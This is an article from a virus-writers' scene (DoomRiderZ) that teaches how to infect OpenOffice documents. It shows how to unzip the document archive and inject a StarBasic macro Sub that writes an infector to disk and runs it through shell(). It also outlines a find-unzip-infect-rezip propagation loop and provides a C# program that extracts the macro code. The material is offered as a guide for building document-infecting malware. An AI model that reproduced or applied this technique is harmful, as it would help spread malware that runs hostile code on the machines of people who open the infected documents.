Some ideas about OpenOffice infection
WarGame / DooMRiderZ
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++ Some ideas about OpenOffice infection by [WarGame/DoomRiderz] ++++++ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1) Introduction 2) How an openoffice document is made 3) How to infect 4) Code 5) Last words 6) Greetz 1) Introduction This article will try to explain a new way of infecting openoffice documents. Other OO virii have been written using the basic programming language offered by OO, like Starbucks, Stardust or the multi platform BadBunny. It is possible to infect the documents using their simple structure. Let's go! 2) How an openoffice document is made An OO document is simply a zip archive, so you can "open" a document with any archiving program. This is what you get (it should be the same for all OO documents, created by writer,calc, draw etc...): content.xml <- a plain text XML file meta.xml <- a plain text XML file settings.xml <- a plain text XML file styles.xml <- a plain text XML file mimetype <- a plain text file META-INF <- a directory Configurations2 <- a directory Thumbnails <- a directory Basic <- a directory (very interesting!) How you can see the archive contains text files and directories, I will not waste much time explaining all of them, their name suggest their meaning. Looking deeper I noticed the directory "Basic", it contains the macros defined in the document. This subdirectory contains: script-lc.xml <- a plain text XML file Standard <- a directory The directory "Standard" contains: script-lb.xml <- a plain text XML file UserDefined.xml <- a plain text XML file (the name of this file depends by the user that created the macros) Eureka! The file "UserDefined.xml" contains the basic code of the macros!!! We have to play with this file to infect a document using our own macro code. This is what it contains in my example file "Example.odt" (its name is ExampleMacros.xml): -- ExampleMacros.xml -- <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE script:module PUBLIC "-//OpenOffice.org//DTD OfficeDocument 1.0//EN" "module.dtd"> <script:module xmlns:script="http://openoffice.org/2000/script" script:name="ExampleMacros" script:language="StarBasic">REM first macro Sub example1 msgbox &quot;example1&quot;,,&quot;example1&quot; End Sub REM second macro Sub example2 msgbox &quot;example2&quot;,,&quot;example2&quot; End Sub </script:module> ----------------------- The file is an xml document, it can be parsed in many ways, using libraries or writing your own procedures. We should do a check, infact it's possible to save the documents in an encrypted form using a password, let's look at script-lb.xml (this one is in my example file). --- script-lb.xml --- <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE library:library PUBLIC "-//OpenOffice.org//DTD OfficeDocument 1.0//EN" "library.dtd"> <library:library xmlns:library="http://openoffice.org/2000/library" library:name="Standard" library:readonly="false" library:passwordprotected="false"> <library:element library:name="ExampleMacros"/> </library:library> --------------------- We have to check library:passwordprotected, if it is set to true, the document is encrypted. 3) How to infect We can infect it in two ways (maybe there are more, be creative!) 1 - Adding (or modifying an existing Sub) our own code that drops&executes the code of the infector 2 - Injecting a full functional oo virus written in basic I prefer the first one (the second one is useless for me), so our injected code should look like this: ----- Injected sub ----- Sub DropInfector open path_to_write_the_infector for output as #1 print #1,... REM write the code of the infector close #1 shell(path_to_write_the_infector,0) REM execute the infector End Sub ------------------------ So my example file "ExampleMacros.xml" would become: -- ExampleMacros.xml (infected) -- <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE script:module PUBLIC "-//OpenOffice.org//DTD OfficeDocument 1.0//EN" "module.dtd"> <script:module xmlns:script="http://openoffice.org/2000/script" script:name="ExampleMacros" script:language="StarBasic">REM first macro Sub example1 msgbox &quot;example1&quot;,,&quot;example1&quot; End Sub REM second macro Sub example2 msgbox &quot;example2&quot;,,&quot;example2&quot; End Sub REM Sub added by our infector Sub DropInfector open path_to_write_the_infector for output as #1 print #1,... REM write the code of the infector close #1 shell(path_to_write_the_infector,0) REM execute the infector End Sub </script:module> ---------------------------------- Our Sub could be also multi platform, look at BadBunny in DoomRiderz#1 for an example, to be more portable. This task could be done in languages like python or C++ that have libraries that help you to accomplish this job (unzipping,xml parsing,rezipping). This is the flow of the infection process: 1 - Find OpenOffice documents (FindFirstFile()/FindNextFile() for Windows, opendir() for unix like systems) 2 - Unzip the found document (zlib can help) 3 - Infect the UserDefined.xml file in the Standard directory 4 - Rezip the document 5 - Go to the first step An other idea for a nice payload could be editing "content.xml", so the user will see your message! 4) Code This is an example C# program that shows you how to parse the xml file containing the macro code: -- GetMacroCode.cs -- // you will need "module.dtd" in the same directory of the program using System; using System.Collections.Generic; using System.Text; using System.Xml; namespace GetMacroCode { class Program { static void Main(string[] args) { if (args.Length == 0) { Console.WriteLine("Specify the xml file!"); } else { // thx to Retr0 XmlReaderSettings settings = new XmlReaderSettings(); settings.ProhibitDtd = false; XmlReader xmlRead = XmlReader.Create(args[0],settings); while (xmlRead.Read()) { if (xmlRead.Name == "script:module") { string macro_code = xmlRead.ReadString(); // macro code is here Console.WriteLine(macro_code); } } xmlRead.Close(); } } } } --------------------- You will need also the file module.dtd (it's attached to this article) to make this proggy works. (My suggestion is to read the xml file in a "raw" way, without using classes or other stuff). 5) Last words The explained technique can be expanded in more original ways. OO is a nice suite, but its format is too vulnerable to this kind of attacks. For any comments you can send an e-mail to wargame89@yahoo.it Web: http://vx.netlux.org/wargamevx - http://vx.netlux.org/doomriderz Bye! 6) Greetz A big thx goes to all #virus,#eof-project,#vx-lab @ undernet